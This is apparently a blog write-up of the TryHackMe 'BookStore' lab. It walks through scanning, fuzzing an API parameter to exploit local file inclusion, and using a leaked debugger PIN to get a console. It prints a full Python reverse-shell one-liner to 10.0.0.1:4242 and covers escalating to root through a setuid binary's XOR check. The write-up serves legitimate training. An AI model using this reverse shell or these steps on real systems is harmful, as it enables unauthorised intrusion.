Blue Arachnid

Penetration Tester and Security Reseracher

TryHackme

BookStore – TryHackMe

by Mohamed Munazzir

write-up for Tryhackme room bookstore

Difficulty Level – Medium

Start with Nmap scan

nmap -A -oN initial 10.10.193.97

then run gobuster on all ports

go though the website and find the hidden hint, some are inside source view, which are

<!--Still Working on this page will add the backend support soon, also the debugger pin is inside sid's bash history file -->


//the previous version of the api had a paramter which lead to local file inclusion vulnerability, glad we now have the new version which is secure.

So now we are aware of “/api/v1” vulnerable to LFI if we can read .bash_history we can get PIN

i try with “id” parameter it didn’t work so need to FUZZ the parameter.

wfuzz -u http://10.10.193.97:5000/api/v1/resources/books\?FUZZ\=.bash_history -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt --hc 404

with “show” parameter we can read the file.

we got the PIN now we can unlock the console with is in port 5000, after unlock console we can get reverse shell.

it is python interactive console you can use any python reverse shell code to get shell, you can find more command here.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

Privilege Escalation

we can see a binary in current folder also it is owned by root, if we can execute it without error can get root easily but problem is we don’t know anything about it so download it to your local PC and analysis it using “Ghidra“. if you don’t have much knowledge about you can learn here.

This is the most important detail about binary

void main(void)

{
  long in_FS_OFFSET;
  uint local_1c;
  uint local_18;
  uint local_14;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setuid(0);
  local_18 = 0x5db3;
  puts("What\'s The Magic Number?!");
  __isoc99_scanf(&DAT_001008ee,&local_1c);
  local_14 = local_1c ^ 0x1116 ^ local_18;
  if (local_14 == 0x5dcd21f4) {
    system("/bin/bash -p");
  }
  else {
    puts("Incorrect Try Harder");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

there are some hexadecimal we need to convert into decimal, you can do it here.

local_14 = 0x5dcd21f4      =  1573724660
local_18 = 0x5db3          =  23987
         = 0x1116          =  4374

local_14 = local_1c ^ 0x1116 ^ 0x5db3

if I’m correct we need to find the “local_1cXOR value, now we have all the details to calculate, you can calculate this with Programming feature in most of the Calculator

we get the following Answer.

lets execute binary and get root

Finally Root!!

Happy Hacking.

Share this post

Related posts

Wreath – TryHackMe

Broker – TryHackMe

EnPass – TryHackMe